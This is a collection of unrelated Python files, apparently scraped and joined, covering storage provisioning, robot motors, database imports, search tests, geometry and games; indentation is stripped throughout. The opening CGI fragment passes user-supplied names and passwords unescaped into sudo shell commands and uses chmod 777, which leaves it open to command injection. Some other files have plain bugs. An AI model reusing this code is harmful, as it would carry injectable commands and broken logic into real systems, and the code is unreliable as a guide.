f1.write("\nimport commands\ncommands.getoutput('iscsiadm --mode discoverydb --type sendtargets --portal 192.168.43.98 --discover')\ncommands.getoutput('iscsiadm --mode node --targetname "+user+" --portal 192.168.43.103:3260 --login')")
f1.close()
commands.getoutput('sudo chmod 777 /var/www/html/clienttar/iscsi.py')
commands.getoutput("sudo tar -cvf /var/www/html/clienttar/"+user+"_iscsi.tar /var/www/html/clienttar/iscsi.py")
print "<html>"
print "<p><a href='http://192.168.43.103/clienttar/"+user+"_iscsi.tar' download>Downlode</a> tar file and run it.......</p>"
print "</html>"
elif (n=="4") and (a !="") and (b !=""):
commands.getoutput("sudo lvcreate --name "+user+" --size "+hd+"G vg1")
commands.getoutput("sudo mkfs.ext4 /dev/vg1/"+user+"")
commands.getoutput("sudo mkdir /media/"+user+"")
commands.getoutput("sudo mount /dev/vg1/"+user+" /media/"+user+"")
#commands.getoutput("sudo yum install samba samba-client")
commands.getoutput("sudo useradd -s /sbin/nologin "+user+"")
commands.getoutput("sudo echo -e '"+password+"\n"+password+"\n' | smbpasswd -a "+user+"")
f1=open('/etc/samba/smb.conf','a')
f1.write("\n["+user+"]\npath = /media/"+user+"\nwritable = yes\nbrowseable = yes")
f1.close()
commands.getoutput("systemctl restart smb")
f1=open('/var/www/html/clienttar/smb.py','w+')
f1.write("\nimport commands \ncommands.getoutput('yum install cifs-utils samba-client')\ncommands.getoutput('mkdir /media/"+user+"')\ncommands.getoutput('mount -o username="+user+"//192.168.43.103/"+user+" /media/"+user+"')")
f1.close()
commands.getoutput('sudo chmod 777 /var/www/html/clienttar/smb.py')
commands.getoutput("sudo tar -cvf /var/www/html/clienttar/"+user+"_smb.tar /var/www/html/clienttar/smb.py")
print "<html>"
print "<p><a href='http://192.168.43.103/clienttar/"+user+"_smb.tar' download>Downlode</a> tar file for linux user and run it</p>"
print "<p>Windows users go to RUN window and type IP-->//192.168.43.98 and give username and password </p>"
print "</html>"
else :
print "<html>"
print "Wrong user name or password"
print "</html>"
|
#!/usr/bin/python
"""
Provides ability to control the motors using two controllers on the robot.
"""
import logging
import MotorController
MODULE_LOGGER = logging.getLogger("__main__.DualMotorController")
class DualMotorController(object):
"""
Provides ability to control the motors on the robot.
"""
def __init__(self, left_front_forward, left_front_backward,
right_front_forward, right_front_backward, left_back_forward,
left_back_backward, right_back_forward, right_back_backward):
MODULE_LOGGER.info("Initialising DualMotorController")
self.front_controller = MotorController.MotorController(
left_front_forward, left_front_backward, right_front_forward,
right_front_backward)
self.rear_controller = MotorController.MotorController(
left_back_forward, left_back_backward, right_back_forward,
right_back_backward)
def cleanup(self):
"""
Sets all motors off and sets GPIO to standard values
"""
self.front_controller.cleanup()
self.rear_controller.cleanup()
MODULE_LOGGER.info("Cleaned up DualMotorController")
def stop(self):
"""
Causes the Robot to stop all motors
"""
self.front_controller.stop()
self.rear_controller.stop()
def forward(self, speed):
"""
Move each wheel forward
Sets both motors to move forward at speed. 0 <= speed <= 100
"""
self.front_controller.forward(speed)
self.rear_controller.forward(speed)
def reverse(self, speed):
"""
Move each wheel forward
Sets both motors to reverse at speed. 0 <= speed <= 100
"""
self.front_controller.reverse(speed)
self.rear_controller.reverse(speed)
def spin_left(self, speed):
"""
Causes the Robot to rotate left as fast as possible
Sets motors to turn opposite directions at speed. 0 <= speed <= 100
"""
self.front_controller.spin_left(speed)
self.rear_controller.spin_left(speed)
def spin_right(self, speed):
"""
Causes the Robot to rotate right as fast as possible
Sets motors to turn opposite directions at speed. 0 <= speed <= 100
"""
self.front_controller.spin_right(speed)
self.rear_controller.spin_right(speed)
def turn_forward(self, left_speed, right_speed):
"""
Causes the Robot to turn
Sets motors to turn opposite directions at speed. 0 <= speed <= 100
"""
self.stop()
self.front_controller.turn_forward(left_speed, right_speed)
self.rear_controller.turn_forward(left_speed, right_speed)
def turn_reverse(self, left_speed, right_speed):
"""
Causes the Robot to turn
Sets motors to turn opposite directions at speed. 0 <= speed <= 100
"""
self.stop()
self.front_controller.turn_reverse(left_speed, right_speed)
self.rear_controller.turn_reverse(left_speed, right_speed)
def front_left_forward(self, speed):
"""
Causes the Robot to turn right using just one wheel
Sets just one side to turn. 0 <= speed <= 100
"""
self.front_controller.left_forwards(speed)
def front_left_backward(self, speed):
"""
Causes the Robot to turn right using just one wheel
Sets just one side to turn. 0 <= speed <= 100
"""
self.front_controller.left_backwards(speed)
def front_right_forward(self, speed):
"""
Causes the Robot to turn right using just one wheel
Sets just one side to turn. 0 <= speed <= 100
"""
self.front_controller.right_forwards(speed)
def front_right_backward(self, speed):
"""
Causes the Robot to turn right using just one wheel
Sets just one side to turn. 0 <= speed <= 100
"""
self.front_controller.right_backwards(speed)
def rear_left_forward(self, speed):
"""
Causes the Robot to turn right using just one wheel
Sets just one side to turn. 0 <= speed <= 100
"""
self.rear_controller.left_forwards(speed)
def rear_left_backward(self, speed):
"""
Causes the Robot to turn right using just one wheel
Sets just one side to turn. 0 <= speed <= 100
"""
self.rear_controller.left_backwards(speed)
def rear_right_forward(self, speed):
"""
Causes the Robot to turn right using just one wheel
Sets just one side to turn. 0 <= speed <= 100
"""
self.rear_controller.right_forwards(speed)
def rear_right_backward(self, speed):
"""
Causes the Robot to turn right using just one wheel
Sets just one side to turn. 0 <= speed <= 100
"""
self.rear_controller.right_backwards(speed)
|
# -*- coding: utf-8 -*-
import csv, sys, pytz, datetime
import psycopg2
import uuid, calendar
import logging
import re
def localice(date):
if date.tzinfo is not None:
return date
timezone = "America/Buenos_Aires"
tz = pytz.timezone(timezone)
local = tz.localize(date)
return local
def replaceTime(date,time):
return date.replace(hour=time.hour,minute=time.minute,second=0,microsecond=0)
if __name__ == '__main__':
if len(sys.argv) < 6:
print('debe invocar el script con los siguientes parámetros :')
print('cat archivo.csv | python {} host port db user pass'.format(sys.argv[0]))
sys.exit(1)
#logging.basicConfig(filename='/tmp/import-schedule.log',format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG)
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG)
host = sys.argv[1]
port = sys.argv[2]
db = sys.argv[3]
user = sys.argv[4]
passw = sys.argv[5]
date = datetime.datetime.now()
dates = calendar.Calendar().monthdatescalendar(date.year,date.month-1)
firstWeek = dates[0][:7]
con = psycopg2.connect(host=host, port=port, user=user, password=passw, dbname=db)
cur = con.cursor()
cur.execute("set time zone %s",('utc',))
#cur.execute('delete from assistance.schedule')
logging.basicConfig(level=logging.DEBUG)
lines = 0
for line in csv.reader(sys.stdin):
try:
logging.debug(line)
""" salto el titulo """
if lines < 2:
lines = lines + 1
continue
nombre,app,dni,le,ls,me,ms,mme,mms,je,js,ve,vs,se,ss,de,ds = line
#para eliminar el header que siempre queda
if nombre == 'Nombre':
continue
if dni == None or dni == '':
logging.warn('ignorando {} ya que no tiene dni'.format(line))
continue
pid = str(uuid.uuid4())
cur.execute('select id,dni from profile.users where dni = %s', (dni,))
if cur.rowcount <= 0:
cur.execute('insert into profile.users (id,dni,name,lastname) values (%s,%s,%s,%s)', (pid,dni,nombre,app))
else:
pid = cur.fetchone()[0]
cur.execute('update profile.users set name = %s, lastname = %s where id = %s',(nombre,app,pid))
logging.warn("{0} ya existe - {1}".format(dni,pid))
""" actualizo para asignarle el perfil de usuario dentro del sistema de asistencia """
cur.execute('select user_id from credentials.auth_profile where user_id = %s and profile = %s',(pid,'USER-ASSISTANCE'))
if cur.rowcount <= 0:
cur.execute('insert into credentials.auth_profile (user_id,profile) values (%s,%s)',(pid,'USER-ASSISTANCE'))
""" actualizo el tema del horario """
cur.execute('delete from assistance.schedule where user_id = %s',(pid,))
entradas = [le,me,mme,je,ve,se,de]
salidas = [ls,ms,mms,js,vs,ss,ds]
for i in range(7):
e = entradas[i]
s = salidas[i]
date = firstWeek[i]
if e.strip() != '' and s.strip() != '':
logging.debug('procesando fecha {} entrada {} y salida {}'.format(date,e,s))
timeE = datetime.datetime.strptime(e,'%H:%M:%S')
timeS = datetime.datetime.strptime(s,'%H:%M:%S')
date = datetime.datetime.combine(date,datetime.time())
logging.debug('generando schedule para la fecha {}'.format(date))
awareDate = localice(date)
#awareDate = aware.replace(hour=0,minute=0,second=0,microsecond=0)
sstart = replaceTime(awareDate,timeE)
send = replaceTime(awareDate,timeS)
uaware = awareDate.astimezone(pytz.utc)
ustart = sstart.astimezone(pytz.utc)
uend = send.astimezone(pytz.utc)
req = (str(uuid.uuid4()), pid, uaware, ustart, uend, True, False, False)
logging.debug('Insertando schedule : {}'.format(str(req)))
cur.execute('insert into assistance.schedule (id,user_id,date,sstart,send,isDayOfWeek,isDayOfMonth,isDayOfYear) values (%s,%s,%s,%s,%s,%s,%s,%s)',req)
con.commit()
except Exception as e:
logging.exception(e)
con.close()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 9 13:48:17 2017
@author: dgratz
"""
from plotBeat2beatCLGrid import b2bCL
from plotSynchronyMeasure import b2bSync
import matplotlib.pyplot as plt
import numpy as np
from scipy import signal
from glob import glob
import re
folders = glob('D:/synchrony-data/AllConnLogNormal/*/')
s = re.compile('/')
conns = []
#avgCL = []
avgSV = []
avgST = []
for folder in folders:
# plt.figure()
conns.append(float(s.split(folder)[-2]))
# plt.subplot(3,1,1)
b2bSTimes,b2bST,b2bSV=b2bSync(folder+'/',3)
b2bCLX, b2bCLY = b2bCL(folder)
# avgCL.append(np.mean(b2bCLY))
avgSV.append(np.mean(b2bSV))
avgST.append(np.mean(b2bST))
for rn in range(b2bCLY.shape[0]):
for cn in range(b2bCLY.shape[1]):
if b2bCLY[rn,cn].max() > 450:
b2bCLY[rn,cn] = np.zeros(0)
b2bCLX[rn,cn] = np.zeros(0)
# for i in range(b2bCLX.shape[0]):
# for j in range(b2bCLX.shape[1]):
# plt.plot(b2bCLX[i,j],b2bCLY[i,j])
# plt.subplot(3,1,2)
# plt.plot(b2bSTimes,b2bST)
#plt.plot(b2bSTimes,signal.medfilt(b2bST,kernel_size=5))
# plt.subplot(3,1,3)
# plt.plot(b2bSTimes,b2bSV)
#plt.plot(conns,avgCL)
plt.plot(conns,avgSV)
plt.plot(conns,avgST)
|
import unittest
import json
from elasticsearch import helpers, Elasticsearch, TransportError
from flask import current_app as app
import numpy as np
from app.main import db
from app.test.base import BaseTestCase
from app.main.lib.shared_models.shared_model import SharedModel
class TestSimilaryBlueprint(BaseTestCase):
maxDiff = None
use_model_key = 'multi-sbert'
test_model_key = 'shared-model-test'
def setUp(self):
super().setUp()
es = Elasticsearch(app.config['ELASTICSEARCH_URL'])
es.indices.delete(index=app.config['ELASTICSEARCH_SIMILARITY'], ignore=[400, 404])
es.indices.create(index=app.config['ELASTICSEARCH_SIMILARITY'])
es.indices.put_mapping(
body=json.load(open('./elasticsearch/alegre_similarity.json')),
index=app.config['ELASTICSEARCH_SIMILARITY']
)
es.indices.close(index=app.config['ELASTICSEARCH_SIMILARITY'])
es.indices.put_settings(
body=json.load(open('./elasticsearch/alegre_similarity_settings.json')),
index=app.config['ELASTICSEARCH_SIMILARITY']
)
es.indices.open(index=app.config['ELASTICSEARCH_SIMILARITY'])
def test_similarity_mapping(self):
es = Elasticsearch(app.config['ELASTICSEARCH_URL'])
mapping = es.indices.get_mapping(
index=app.config['ELASTICSEARCH_SIMILARITY']
)
self.assertDictEqual(
json.load(open('./elasticsearch/alegre_similarity.json')),
mapping[app.config['ELASTICSEARCH_SIMILARITY']]['mappings']
)
def test_elasticsearch_similarity_english(self):
with self.client:
for term in json.load(open('./app/test/data/similarity.json')):
term['text'] = term['content']
del term['content']
response = self.client.post('/text/similarity/', data=json.dumps(term), content_type='application/json')
result = json.loads(response.data.decode())
self.assertEqual(True, result['success'])
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'this is a test'
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(3, len(result['result']))
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'something different'
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'this is a test',
'context': {
'dbid': 12,
'app': 'check'
}
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'Magnitude 4.5 quake strikes near Fort St. John',
'threshold': 0.7
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(2, len(result['result']))
def test_elasticsearch_similarity_hindi(self):
with self.client:
for term in [
{ 'text': 'नमस्ते मेरा नाम करीम है' },
{ 'text': 'हॅलो माझे नाव करीम आहे' }
]:
response = self.client.post('/text/similarity/', data=json.dumps(term), content_type='application/json')
result = json.loads(response.data.decode())
self.assertEqual(True, result['success'])
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'नमस्ते मेरा नाम करीम है',
'language': 'en'
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(2, len(result['result']))
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'नमस्ते मेरा नाम करीम है',
'language': 'hi'
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
def test_model_similarity(self):
with self.client:
term = { 'text': 'how to delete an invoice', 'model': TestSimilaryBlueprint.use_model_key, 'context': { 'dbid': 54 } }
response = self.client.post('/text/similarity/', data=json.dumps(term), content_type='application/json')
result = json.loads(response.data.decode())
self.assertEqual(True, result['success'])
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'how to delete an invoice',
'model': TestSimilaryBlueprint.use_model_key,
'context': {
'dbid': 54
}
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
similarity = result['result'][0]['_score']
self.assertGreater(similarity, 0.7)
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'purge an invoice',
'model': TestSimilaryBlueprint.use_model_key,
'threshold': 0.7,
'context': {
'dbid': 54
}
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
similarity = result['result'][0]['_score']
self.assertGreater(similarity, 0.7)
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'purge an invoice',
'model': TestSimilaryBlueprint.use_model_key,
'threshold': 0.7
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
similarity = result['result'][0]['_score']
self.assertGreater(similarity, 0.7)
def test_wrong_model_key(self):
with self.client:
term = { 'text': 'how to slice a banana', 'model': TestSimilaryBlueprint.use_model_key, 'context': { 'dbid': 54 } }
response = self.client.post('/text/similarity/', data=json.dumps(term), content_type='application/json')
result = json.loads(response.data.decode())
self.assertEqual(True, result['success'])
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'how to slice a banana',
'model': TestSimilaryBlueprint.test_model_key,
'context': {
'dbid': 54
}
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(0, len(result['result']))
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-#
#-------------------------------------------------------------------------------
# Name: convert_dots_to_bbox.py
# Author: wdf
# Date: 2019/7/18
# IDE: PyCharm
# Parameters:
# @param:
# @param:
# Return:
#
# Description:
# Usage:
#-------------------------------------------------------------------------------
def get_total_row_cols(x):
# # 输入交点列表,计算每行一共有多少个点
# 输出为点的行偏移、本行点数(字典形式)
# 格式
# [58, 174, 1, 1],
# [557, 145, 1, 1],
# [513, 145, 1, 1],
# [471, 145, 1, 1],
# [58, 145, 1, 1]]
row = {}
num = 1
for i in range(len(x)-1):
if x[i][1] == x[i+1][1]:
num += 1
row[x[i][1]] = num
else:
num = 1
return row
def get_dots(x, row):
# 得到点的坐标
# 输入:
# 点列表x,
# 每行点数
results = []
# print("坐标值, 本行点数")
for key in row:
# print(row[key])
# print("*"*50)
# print(key, row[key])
for val in range(row[key]):
# print(key)
yy = key
xx = [val[0] for val in x if val[1]==yy]
result = [[x,yy] for x in xx]
# print(result)
results.append(result)
return results
def get_bounding_box(results):
# 得到bounding box的对角线两点坐标(右下角、左上角)
# 输入:results = get_dots(row)
# 输出:
bounding_box = []
for i in range(len(results) - 1):
col_down = results[i]
col_up = results[i + 1]
# print(col_down)
# print(col_up)
len_down, len_up = len(col_down), len(col_up)
# print(len_down,len_up)
if len_down == len_up: # 上下两行点数相同,直接取对角点
# print("上下两行点数相同,直接取对角点")
for j in range(len(col_down) - 1):
# print(col_down[j], col_up[j + 1])
bounding_box.append([col_down[j], col_up[j + 1]])
elif len_down > len_up: # 下面点数多:
# print("下面点数多")
for j in range(len(col_up) - 1):
k = j # k存储多的点
while k < len_down - 1: # 遍历下面所有的点(点数多的那条直线)
if col_down[k + 1][0] == col_up[j + 1][0]:
# print(col_down[k], col_up[j + 1])
bounding_box.append([col_down[k], col_up[j + 1]])
k += 1
else: # 上面点数多
# print("上面点数多")
for j in range(len(col_down) - 1):
k = j # k存储多的点
while k < len_up - 1: # 遍历上面所有的点(点数多的那条直线)
if col_up[k + 1][0] == col_down[j + 1][0]:
# print(col_down[j], col_up[k + 1])
bounding_box.append([col_down[j], col_up[k + 1]])
k += 1
return bounding_box
def main():
x = [[549, 764, 1, 1], [317, 764, 1, 1], [85, 764, 1, 1], [549, 738, 1, 1], [317, 738, 1, 1], [85, 738, 1, 1],
[549, 712, 1, 1], [317, 712, 1, 1], [85, 712, 1, 1], [549, 687, 1, 1], [317, 687, 1, 1], [85, 687, 1, 1],
[549, 636, 1, 1], [317, 636, 1, 1], [85, 636, 1, 1], [549, 539, 1, 1], [317, 539, 1, 1], [85, 539, 1, 1],
[549, 488, 1, 1], [317, 488, 1, 1], [85, 488, 1, 1], [549, 462, 1, 1], [317, 462, 1, 1], [85, 462, 1, 1],
[549, 343, 1, 1], [85, 343, 1, 1], [549, 317, 1, 1], [317, 317, 1, 1], [85, 317, 1, 1], [549, 279, 1, 1],
[317, 279, 1, 1], [85, 279, 1, 1], [549, 253, 1, 1], [317, 253, 1, 1], [85, 253, 1, 1], [85, 82, 1, 1],
[85, 69, 1, 1]]
row = get_total_row_cols(x)
results = get_dots(x, row)
# print(results)
bounding_boxs = get_bounding_box(results)
print(bounding_boxs)
if __name__ == '__main__':
main()
|
#for matrices and solving linear equations
import numpy as np
#future vector
F1 = np.array([1800, 900])
F2 = np.array([1100, 1500])
#b vector
B = np.array([1, 1])
#present
X = np.array([[200, 700],
[300, 100]])
for i in range(3):
#ne3awd bel B
A = np.dot(np.linalg.inv(X * B.reshape(1, 2)), F1.reshape(2,1))
B = np.dot(np.linalg.inv(X * A.reshape(2, 1)), F2.reshape(2,1))
print (A)
print (B)
print (A)
print (B)
|
import socket
from urllib import error,request
try:
response = request.urlopen('http://zhaojiaxing.top/',timeout=0.01)
except error.URLError as e:
print(type(e.reason))
if isinstance(e.reason,socket.timeout):
print('time out')
|
import cv2
import matplotlib.pyplot as plt
img = cv2.imread("/home/mmc/code/python_opencv/Books/Practical Python and OpenCV, 3rd Edition/code/images/trex.png")
cv2.imshow('platjeta', img)
img[0:100,0:100] = (0,0,255)
cv2.imshow('modified', img)
|
class Solution:
# @param A : string
# @return an integer
def lengthOfLastWord(self,A):
s = A.split(' ')
s = s.rstrip()
length = len(s)
if(length == 0):
return 0
if(length == 1):
return len(s[0])
else:
return len(s[length-1])
|
from PyQt5.QtMultimedia import QMediaPlayer, QMediaContent
from PyQt5.QtCore import QUrl
import time
from StatusCode import *
MUSIC_PATH = r'H:\Projects\PyCharmProjects\MusicPlayer\Music\排骨教主 - 牵丝戏.mp3'
# PLAYER_STATE_STOP = 0
# PLAYER_STATE_PLAY = 1
# PLAYER_STATE_PAUSE = 2
class Player():
def __init__(self):
self.player = QMediaPlayer()
self.state = PLAYER_STATE_STOP
def setMedia(self, music):
self.player.setMedia(music)
def play(self):
print(self.player.mediaStatus())
if self.state == PLAYER_STATE_PAUSE:
self.state = PLAYER_STATE_PLAY
self.player.play()
elif self.state == PLAYER_STATE_STOP:
if self.player.mediaStatus() == LOADED_MEDIA:
self.state = PLAYER_STATE_PLAY
self.state.play()
def pause(self):
if self.state == PLAYER_STATE_PLAY:
self.state = PLAYER_STATE_PAUSE
self.player.pause()
def stop(self):
self.player.state = PLAYER_STATE_STOP
if __name__ == '__main__':
path = QUrl.fromLocalFile(MUSIC_PATH)
music = QMediaContent(path)
player = Player()
player.setMedia(music)
player.play()
|
import numpy as np
## constants = {k: None, alpha: None, k_a:-, alpha_a:-, k_s:-, alpha_s:-, dmax:-, exp_type:-, p:-}
class DpwNode(object):
def __init__(self,parent,depth,constants,k,a,init_n=0):
## Tree data
self.parent = parent
self.children = []
self.exploration_type = constants['exploration_type']
## Node data
self.N = init_n
## Set up node expansion / exploration
if self.exploration_type=='ucb':
self.k = k
self.alpha = a
depth = None
self.allow_new_func = lambda: len(self.children)<=np.floor(self.k * self.N**self.alpha)
self.max_children_ka = lambda: self.k * self.N**self.alpha
elif self.exploration_type=='polynomial' or self.exploration_type=='polynomial_heuristic':
if self.exploration_type=='polynomial':
depth_diff = constants['dmax'] - depth
if abs(np.rint(depth)-depth)<1e-5: ## If depth is integer (in state node)
self.alpha = (10.*depth_diff-3.)**-1
else: ## If depth is not integer (in action node)
if depth_diff>=1.5:
self.alpha = 3./(10.*depth_diff-3.)
elif abs(abs(depth_diff)-0.5)<1e-5:
self.alpha = 1.
else:
assert(False)
self.e_d = (1./(2.*constants['p']))*(1.-3./(10*depth_diff))
else:
self.k = k
self.alpha = a
self.e_d = constants['e_d']
self.allow_new_func = lambda: np.floor(self.N**self.alpha)>np.floor((self.N-1)**self.alpha)
else:
raise NotImplementedError
@property
def allow_new_node(self):
return self.allow_new_func()
@property
def get_max_children_ka(self):
return self.max_children_ka()
class DpwActionNode(DpwNode):
def __init__(self,act,parent,depth,constants,init_n=0,init_q=1,risk=0.):
assert(abs(np.modf(depth)[0]-0.5)<1e-5)
DpwNode.__init__(self,parent,depth,constants,constants['k_a'],constants['alpha_a'],
init_n=init_n)
self.act = act
self.Q = init_q
self.risk = risk
self.N_immediate_violations = 0
self.e_d = None
@property
def immediate_risk(self):
return float(self.N_immediate_violations)/self.N
class DpwStateNode(DpwNode):
def __init__(self,state,reward,parent,depth,constants,violates_constraint,init_n=1):
assert(abs(np.rint(depth)-depth)<1e-5)
DpwNode.__init__(self,parent,depth,constants,constants['k_s'],constants['alpha_s'],init_n=init_n)
self.state = state
self.reward = reward
self.violates_constraint = violates_constraint
|
import numpy as np
import pandas as pd
from KNearestNeighbor import KNearestNeighbors
#taking inputs
data=pd.read_csv('Social_Network_Ads.csv')
data['Gender'] = data['Gender'].replace({'Male': 0, 'Female': 1})
X=data.iloc[:,1:4].values
y=data.iloc[:,-1].values
print(X.shape)
print(y.shape)
#using train_test_split function
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2)
#using StandardScaler function
from sklearn.preprocessing import StandardScaler
scaler=StandardScaler()
X_train=scaler.fit_transform(X_train)
X_test=scaler.transform(X_test)
#an object of knn
knn=KNearestNeighbors(k=5)
knn.fit(X_train,y_train)
#using the predict() function
knn.predict(np.array(X_test).reshape(len(X_test), len(X_test[0])))
#defining a function to check the output
def predict_new():
age=int(input("Enter the age"))
salary=int(input("Enter the salary"))
gender = int(input("Enter the gender,type '0' for Male or type '1' for female"))
X_new=np.array([[age],[gender],[salary]]).reshape(1,3)
X_new=scaler.transform(X_new)
result=knn.predict(X_new)
if result==0:
print("Will not purchase")
else:
print("Will purchase")
predict_new()
|
import random
from objects import *
sizes = [1,2,3,2,1,2,4]
class App:
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = 800, 600
self.delta_time = 0
self.internal_clock = 0
self.last_frame_tick = 0
self.scale = 0.4
self.point = 0
self.default_fallspeed = 175
self.slowdown_factor = 0.5
self.spawn_clock = 0
self.spawn_rate = 1.75
self.max_zombie = len(sizes)*2
random.shuffle(sizes)
self.live = 3
def on_init(self):
pygame.init()
self.last_frame_tick = pygame.time.get_ticks()
self.last_update_tick = pygame.time.get_ticks()
self._display_surf = pygame.display.set_mode(self.size, pygame.HWSURFACE)
self._img_surface = load_img("bg.bmp")[0]
self.pos = [self.width * i / len(sizes) for i in range(len(sizes))]
self.scale = 2/(len(sizes))
self.pipes = [MPipe(sizes[i], self._display_surf, self.pos[i], self.scale) for i in range(len(sizes))]
self.zombies = []
self.aimmark = AimMark(self._display_surf, self.scale / 4)
self.hitcount = PointCount(self._display_surf, (0,0))
self.bg_sound = load_sound("bg_music.wav")
self.boom_sound = load_sound("boom.wav")
self.boom_sound.set_volume(0.5)
self.bg_sound.play(loops=-1)
self._running = True
# init for boom
self.kabooms = []
def on_event(self, event):
if event.type == QUIT:
self._running = False
elif event.type == MOUSEBUTTONDOWN and event.button == 1:
hit = False
for zombie in self.zombies:
if not contains(zombie.dest_pipe.rect, event.pos) and contains(zombie.rects[zombie.index].move(zombie.pos), event.pos):
self.zombies.remove(zombie)
self.hitcount.inc_hit()
hit = True
# new kaboom
self.boom_sound.play(maxtime=500)
self.kabooms.append(Kaboom(self._display_surf, self.scale * 2, 0.1, event.pos))
break
if not hit:
self.hitcount.inc_miss()
elif event.type == MOUSEMOTION:
self.aimmark.set_pos(event.pos)
def on_loop(self):
nc = pygame.time.get_ticks()
self.delta_time = (nc - self.last_frame_tick) / 1000.0
self.last_frame_tick = nc
# create more zombies here
# select pipe to spawn
if len(self.zombies) < self.max_zombie:
if self.spawn_clock < (1/self.spawn_rate):
self.spawn_clock += self.delta_time
else:
self.spawn_clock = 0
num = random.choice(range(len(sizes)))
selected_pipe = self.pipes[num]
self.zombies.append(Zombie(self._display_surf, self.default_fallspeed, self.pos[num], selected_pipe, self.scale))
for zombie in self.zombies:
# remove zombie when he completely fall into pipe
if zombie.get_true_rect().top > zombie.dest_pipe.rect.top:
self.zombies.remove(zombie)
print("fall out")
# slow down zombie when he get into pipe
if zombie.get_true_rect().bottom > zombie.dest_pipe.rect.top:
zombie.set_fallspeed(self.slowdown_factor*self.default_fallspeed)
for kaboom in self.kabooms:
if kaboom.success == 1:
self.kabooms.remove(kaboom)
# do update them
[x.update(self.delta_time) for x in self.zombies]
[x.update(self.delta_time) for x in self.kabooms]
def on_render(self):
self._display_surf.blit(self._img_surface, (0,0))
[x.draw() for x in self.zombies]
[x.draw() for x in self.pipes]
[x.draw() for x in self.kabooms]
self.aimmark.draw()
self.hitcount.draw()
pygame.display.flip()
def on_cleanup(self):
self.bg_sound.stop()
pygame.quit()
def on_execute(self):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.on_loop()
self.on_render()
self.on_cleanup()
if __name__ == "__main__" :
theApp = App()
theApp.on_execute()
|
highest_star = int(input())
current_star = 0
# Ascending
while current_star < highest_star:
current_star += 1
for star in range(1, current_star + 1):
print("*", end= "")
print()
# Desending
while highest_star > 1:
highest_star -= 1
for star_2 in range(1, highest_star + 1):
print("*", end="")
print()
|
import os, re, glob, sys, argparse
from string import Template
class Braced(Template):
pattern = r"""
%(delim)s{(?P<braced>%(id)s)} |
(?P<escaped>^$) |
(?P<named>^$) |
(?P<invalid>^$)
""" % dict(delim=re.escape(Template.delimiter), id=Template.idpattern)
def regen():
parser = argparse.ArgumentParser()
parser.add_argument('--no-certs-yet', action='store_true', dest='noCertsYet')
args = parser.parse_args()
noCertsAvailableYet = args.noCertsYet
print('Converting NGINX config template into regular config file by providing environment variables.')
templates = glob.glob('/etc/nginx/**/*.template.conf', recursive=True)
for templatePath in templates:
confOutputPath = templatePath[:-len('.template.conf')] + '.conf'
print('Updating {} from template.'.format(confOutputPath))
filein = open(templatePath)
src = Braced(filein.read())
configPath = os.environ['NGINX_CONFIG_DIRECTORY'] + '/' + os.environ['NGINX_CONFIG_FILENAME']
certbotChallengeDirectory = os.environ['CERTBOT_CHALLENGE_DIRECTORY']
mapping = dict(
userConfigInclude='include {};'.format(configPath) if not noCertsAvailableYet else '',
certbotChallengeDirectory=certbotChallengeDirectory,
certs='/etc/letsencrypt/live'
)
outString = src.substitute(mapping)
fileout = open(confOutputPath, 'w')
fileout.write(outString)
fileout.close()
sys.stdout.flush()
|
import numpy as np
from cmath import sqrt
def check_limit(point, xp, yp, acc=1e-5):
""" Function that checks whether or not a point is within a certain range of an
x and y coordinate. The input parameter 'point' gives the point that has to
be checked. 'xp' and 'yp' give the coordinates to which the point will be
compared to. 'acc' gives the accuracy for how close the point should be to
the x and y coordinates.
Input: point = point that will be compared (tuple);
xp = x coordinate to which the point will be compared (float);
yp = y coordinate to which the point will be compared (float);
acc = accuracy of how close the point should be (float);
Returns: boolean whether or not the point is inside the given range.
"""
# Checking x coordinate
if point[0] >= xp-acc and point[0] <= xp+acc:
# Checking y coordinate
if point[1] >= yp-acc and point[1] <= yp+acc:
# Point is inside range
return True
# Point is outside range
else: return False
def determine_point(xv, yv, acc=1e-10):
""" Function that determines whether or not the a set of points converge to a point;
e.g. whether or not an attractor is a point attractor. 'xv' and 'yv' give the
list of x and y coordinates respectively. 'acc' determines how close points have
to be to be considered a point attractor.
Input: xv = list or array of x coordinates of the points (list or numpy array);
yv = list or array of y coordinates of the points (list or numpy array);
acc = accuracy for how close the points should be (float);
Returns: the coordinates of the point for a point attractor, None otherwise.
"""
# Constants
L = len(xv) # Number of points in the lists
step = int(L/11) # Step size that will be used
count = 0 # Number of times the point has been found in the list
# The last point of the list
point = (xv[-1], yv[-1])
for i in range(step, L, step+1):
# Checking if the current point is equal to the last point of the list
if check_limit((xv[i], yv[i]), point[0], point[1], acc=acc):
# Point found
count += 1
# Check to see if it was not just coincidentally
if count > 2:
return point # Point attractor
return None
